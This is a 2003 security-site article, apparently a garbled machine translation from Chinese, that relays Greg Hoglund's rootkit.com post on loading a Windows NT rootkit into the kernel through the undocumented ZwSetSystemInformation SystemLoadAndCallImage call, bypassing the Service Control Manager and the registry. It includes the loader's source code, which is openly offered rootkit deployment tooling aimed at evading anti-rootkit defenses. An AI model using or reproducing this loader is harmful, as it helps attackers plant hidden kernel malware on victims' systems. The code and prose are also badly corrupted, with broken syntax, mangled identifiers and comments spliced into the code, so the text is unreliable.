Load rootkit with SystemLoadCallImage:
http://www.xfocus.net
Creation time: 2003-09-25
Article attribute: original
Article submission:
Sephiroth_ (kinvis_at_hotmail.com)
Sephiroth.v
[Foreword]
I have recently been interested in NT Rootkit, and the domestic information is rare. It is almost a blank in this regard, just a "a true rootkit that modifies the NT core" in this respect. The foreign website has been reached a few days, and it is harves not shallow, and the research in this area is indeed profound. Now I translate another article of Gary Hoglund, in which I have added some individual comments, if you are interested in NT Rootkit, you can
Take a look at www.rootkit.com where there is a gary hoglund and a lot of people's excellent NT Rootkit and a lot of valuable information.
[text]
Hello everyone.
During this time, there is a discussion on how to protect the system from rootkit on NetBugTraq. This is a good phenomenon. The purpose of our rootkit.com is to let people think about this problem. For example, there is a PEDESTAL Software's Anti-rootkit (full-name Integrity Protection Driver).
On this year's Blackhat Briefings, many smart people are talking about how many ways load code into kernel mode - it is obviously the impact of "Anti-rootkit". Many rootkit's authors also join. So we intend to change this windows rootkit.
Until now, this Windows rootkit is still designed as a driver. But there is no reason to be a ROOKIT must be designed as a driver - or a loadable module. Last year we release rootkit to prove that software that complete user mode is basically meaningless. Think about it, anyone who can Hack your system can load into kernel mode, which is 100% guaranteed. If an attacker enters your system with a user-level account, they are then get Administrator - to get enough permissions to enable you to load the kernel mode code. In this fact, it is very fragile with your service provider's solution to leave your knowledge.
The idea of putting complete protection in the kernel mode is quite good, but it is impossible to complete unless Microsoft is solved. If Microsoft really does this, then the security company will disappear :)
Now some people put forward a method of loading the kernel mode code, using an unpublished entry
(Entry Point) Entering the kernel space - ratio / dev / physicalMemory device, or a system call (Syscall) using "SystemLoadandCallImage". We continue to study, but the fact is a non-operating system support to control the entered kernel mode - because this, the new entry point (entry point is always discovered.
Assuming that Microsoft really patches the NT structure to protect to avoid these methods mentioned above, there is still a way to find a buffer overflow in the kernel. Each third-party driver you install can give you the possibility of buffer overflow through the ioctl () command or even a normal read / write message. Even the default drivers in NT are also very fragile in this area.
When the rokit is processed when doing driver processing, we use the Service Control Manager (SCM) to load or remove this driver from kernel space. This is a default standard, and it requires this rootkit driver with key value under the Registry CurrentControlSet / Services. Now this situation has been changed, we improve this rootkit so no driver does not need to register key value when it load into the kernel space. We also no longer use SCM, replaced by it uses a separate interrupt call - a NT system called ZWSETSYSTEMINFORMATION (). Using this call We can immediately load this rootkit and activate it.
-Greg hoglund
Source code:
// new deployment module for rootkit 040
// -------------------------------------
// -greg hoglund
http://www.rootkit.com
#include
#include
Typedef struct _unicate_string {
Ushort Length;
Ushort maximumlength;
#ifdef MIDL_Pass
[size_is (maximumlength / 2), Length_is ((Length) / 2)] Ushort *
Buffer;
#ELSE // MIDL_Pass
PWSTR BUFFER;
#ENDIF / / MIDL_PASS
} Unicode_string, * punicode_string;
TypedEf unsigned long ntstatus; // I think here should be typedef long ntstatus,
/ / Otherwise, a unsigned value is always not less than 0, and this macro will
// Problem
#define nt_success (status) (status)> = 0)
NTSTATUS (__stdcall * zwsetsysteminformation)
In dword systeminformationClass,
In Out Pvoid SystemInformation,
In Ulong SystemInformationLength
);
/ *
/ / About ZWSETSYSTEMINFORMATION can refer to Gary Nebbett "Windows NT / 2000
// Native API // Reference "
// ZWsetSystemInformation Sets the information that affects the operating system, defined as follows:
// NTSYSAPI
// ntstatus
// ntapi
// ZWSETSYSTEMINFORMATION
// in system_imformation_calss systeminformationclass,
// in out pvoid systemInformation,
// in Ulong SystemInformationLength;
//
//parameter:
// systemInformationClass: The type of system information that will be set, the value is
System_imformation_calss enumeration of one // SYSTEMLOADALLIMAGE is
One of the:
// typedef struct _system_load_and_call_image {// information class Class
38, // unicode_string modulename;
//} SYSTEM_LOAD_AND_CALL_IMAGE, * psystem_load_and_call_image; //
// member:
// Module: The full path to the Native NT format to load the module
//
// Remarks:
// This information class can only be set, not setting any information, but to load a module
To the kernel address space and the operation of the inlet point. It is expected that the entry-point routine is a batch of two participants.
The __stddcall routine (consistent with the device driver // DriveRErgentry routine). If
The dot routine returns a failure code, then uninstall the module.
//
// SystemInformation: Buffer or variable that is assigned to a caller containing information
// systeminformationLength: The size of SystemInFormaiton in bytes is based on
Set // systemInformationClass to set it
//
* /
Void (__stdcall * rtlinitunicodeString)
In out dstinationstring,
In Pcwstr SourceString
);
TYPEDEF STRUCT_SYSTEM_LOAD_AND_CALL_IMAGE
{
Unicode_string modulename;
} SYSTEM_LOAD_AND_CALL_IMAGE, * psystem_load_and_call_image;
#define systemloadandCallImage 38
Void main (void)
{
///
// Why Mess with drivers?
///
SYSTEM_LOAD_AND_CALL_IMAGE GREGSIMAGE;
Wchar dapath [] = l "///?//c://_root_.sys";
//
// Get DLL Entry Points
//
IF (! (rtLinitunicodeString =
(void *) getProcaddress ("NTDLL.DLL"),
"RTLINITUNICODESTRING"))))))) // Get it in NTDLL.DLL
RTLINITUNICODESTRING address
Exit (1);
IF (! (zwsetsysteminformation =
(void *) getProcaddress ("NTDLL.DLL"),
"ZWSETSYSTEMINFORMATION"))))) // Get it in NTDLL.DLL
ZWSETSYSTEMINFORMATION Address
Exit (1);
RTLinitunicodeString (& Gregsimage.Modulename),
DAPATH); // Establish a device
IF (NT_Success)
ZWsetSystemInformation (SystemLoadCallImage) (SYSTEMLOADALLIMAGE,
& GregsImage,
SIZEOF (SYSTEM_LOAD_AND_CALL_IMAGE)))))))) // Load into the kernel space
{
Printf ("Rootkit Loaded./N");
}
Else
{
Printf ("Rootkit Not Loaded./N");
}
}
The younger brother is limited, it is inevitable to have a wrong place, what opinions or opinions do you have in contact with me?
